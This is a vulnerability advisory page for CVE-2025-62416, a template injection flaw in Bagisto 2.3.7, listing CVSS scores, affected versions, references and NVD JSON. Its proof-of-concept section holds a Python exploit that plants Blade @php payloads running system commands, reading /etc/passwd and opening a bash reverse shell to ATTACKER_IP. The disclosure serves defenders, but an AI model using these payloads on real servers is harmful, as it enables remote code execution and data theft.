CVE-2025-62416

Description

Bagisto is an open source laravel eCommerce platform. Bagisto v2.3.7 is vulnerable to Server-Side Template Injection (SSTI) due to unsanitized user input being processed by the server-side templating engine when rendering product descriptions. This allows an attacker with product creation privileges to inject arbitrary template expressions that are evaluated by the backend — potentially leading to Remote Code Execution (RCE) on the server. This vulnerability is fixed in 2.3.8.

CVSS Details

CVSS Score

5.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:* - VULNERABLE

Bagisto < 2.3.8

Bagisto 2.3.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62416 - Bagisto SSTI via Product Description # Vulnerability: Server-Side Template Injection in Blade template engine # Affected: Bagisto <= 2.3.7 # Fixed in: Bagisto 2.3.8 import requests TARGET_URL = "http://target-bagisto-site.com" ADMIN_TOKEN = "your_admin_or_seller_token" # Step 1: Login as a seller/admin (requires product creation privilege) login_payload = { "email": "[email protected]", "password": "password123" } session = requests.Session() login_resp = session.post(f"{TARGET_URL}/admin/login", data=login_payload) # Step 2: Inject malicious Blade template syntax into product description # Payload 1: Basic template expression evaluation to confirm SSTI ssti_payload_basic = "{{ 7*7 }}" # Payload 2: Execute arbitrary PHP code via @php directive (RCE) ssti_payload_rce = "@php\n echo system('id');\n@endphp" # Payload 3: Read sensitive files from the server ssti_payload_readfile = "@php\n echo file_get_contents('/etc/passwd');\n@endphp" # Payload 4: Reverse shell (replace ATTACKER_IP and PORT) ssti_payload_revshell = "@php\n exec(\"/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'\");\n@endphp" # Step 3: Create a new product with the malicious description product_payload = { "sku": "TEST-SSTI-001", "name": "Test Product", "description": ssti_payload_rce, # Inject the malicious payload here "price": "99.99", "status": "1" } create_resp = session.post( f"{TARGET_URL}/admin/catalog/products/create", data=product_payload ) # Step 4: Trigger the SSTI by visiting the product page (requires user interaction) # When any user browses this product, the Blade engine will execute the injected code trigger_url = f"{TARGET_URL}/product-test-ssti-001" print(f"Product created. Trigger SSTI by visiting: {trigger_url}") print("When a victim visits this page, the injected PHP code will execute on the server.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62416
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62416
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62416/
[4] VulDB https://vuldb.com/cve/CVE-2025-62416
[5] https://github.com/bagisto/bagisto/security/advisories/GHSA-527q-4wqv-g9wj
[6] https://github.com/bagisto/bagisto/security/advisories/GHSA-527q-4wqv-g9wj

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62416", "sourceIdentifier": "[email protected]", "published": "2025-10-16T19:15:34.493", "lastModified": "2025-10-22T17:06:55.040", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Bagisto is an open source laravel eCommerce platform. Bagisto v2.3.7 is vulnerable to Server-Side Template Injection (SSTI) due to unsanitized user input being processed by the server-side templating engine when rendering product descriptions. This allows an attacker with product creation privileges to inject arbitrary template expressions that are evaluated by the backend — potentially leading to Remote Code Execution (RCE) on the server. This vulnerability is fixed in 2.3.8."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:L", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:webkul:bagisto:2.3.7:*:*:*:*:*:*:*", "matchCriteriaId": "991C244A-9DC2-431C-8ABC-BCF3AE81AD09"}]}]}], "references": [{"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-527q-4wqv-g9wj", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/bagisto/bagisto/security/advisories/GHSA-527q-4wqv-g9wj", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}